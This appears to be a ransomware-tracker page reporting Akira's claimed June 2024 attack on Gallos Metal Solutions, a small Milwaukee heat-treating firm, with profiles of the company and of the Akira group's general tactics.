Gallos Metal Solutions Hit by Akira Ransomware, Data Compromised

Incident Date:

June 27, 2024

World map

Overview

Title

Gallos Metal Solutions Hit by Akira Ransomware, Data Compromised

Victim

Gallos Metal Solutions

Attacker

Akira

Location

Milwaukee, USA

Wisconsin, USA

First Reported

June 27, 2024

Ransomware Attack on Gallos Metal Solutions by Akira Group

Overview of Gallos Metal Solutions

Gallos Metal Solutions, Inc., based in Milwaukee, Wisconsin, is a specialized metal heat treating company. Founded in 1974, the company has established itself as a leader in continuous mesh belt atmosphere heat treating. With a workforce of five employees, Gallos Metal Solutions is capable of processing large volumes of small parts in their continuous furnaces. The company prides itself on precise atmosphere and temperature control, ensuring uniform case depths and consistent hardness across parts.

Gallos Metal Solutions serves a diverse range of industries, including construction, automotive, aerospace, and industrial manufacturing. Their services encompass custom metal fabrication, welding, machining, and metal finishing. The company is known for its commitment to quality and customer satisfaction, leveraging advanced technologies and skilled craftsmanship to deliver high-quality metalworking solutions.

Details of the Ransomware Attack

On June 27, 2024, Gallos Metal Solutions fell victim to a ransomware attack orchestrated by the Akira ransomware group. The attack resulted in a significant data breach, compromising sensitive information such as employees' personal files, non-disclosure agreements (NDAs), financial data, and other internal business documents. The exact size of the data leak remains unknown at this time.

The Akira ransomware group claimed responsibility for the attack via their dark web leak site, where they listed Gallos Metal Solutions as one of their victims. The group is known for employing double extortion tactics, where they steal data before encrypting systems and then demand a ransom for both decryption and data deletion.

Profile of the Akira Ransomware Group

Akira is a relatively new but rapidly growing ransomware family that first emerged in March 2023. The group has been targeting small to medium-sized businesses across various sectors, including manufacturing, technology, education, and telecommunications. Akira is believed to be affiliated with the now-defunct Conti ransomware gang, as their code shares similarities with Conti.

Akira's ransom demands typically range from $200,000 to over $4 million. The group distinguishes itself with a unique dark web leak site featuring a retro 1980s-style green-on-black interface that victims must navigate by typing commands. Akira's tactics include unauthorized access to VPNs, credential theft, and lateral movement to deploy the ransomware. They have also been observed using tools like RClone, FileZilla, and WinSCP for data exfiltration.

In April 2023, Akira expanded its operations to target Linux-based VMware ESXi virtual machines in addition to Windows systems. As of January 2024, the group has claimed over 250 victims and $42 million in ransomware proceeds.

Potential Vulnerabilities and Attack Penetration

Gallos Metal Solutions, like many small to medium-sized businesses, may have been targeted due to potential vulnerabilities in their cybersecurity infrastructure. The company's reliance on advanced technologies and continuous furnaces for metal heat treating could have made them an attractive target for threat actors seeking to disrupt critical operations.

Akira's penetration methods often involve exploiting weak points in VPNs and stealing credentials to gain unauthorized access. Once inside the network, the group uses lateral movement techniques to deploy ransomware across systems. The use of data exfiltration tools like RClone, FileZilla, and WinSCP suggests that Akira prioritizes stealing sensitive information before encrypting systems, increasing the pressure on victims to pay the ransom.

Sources:

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.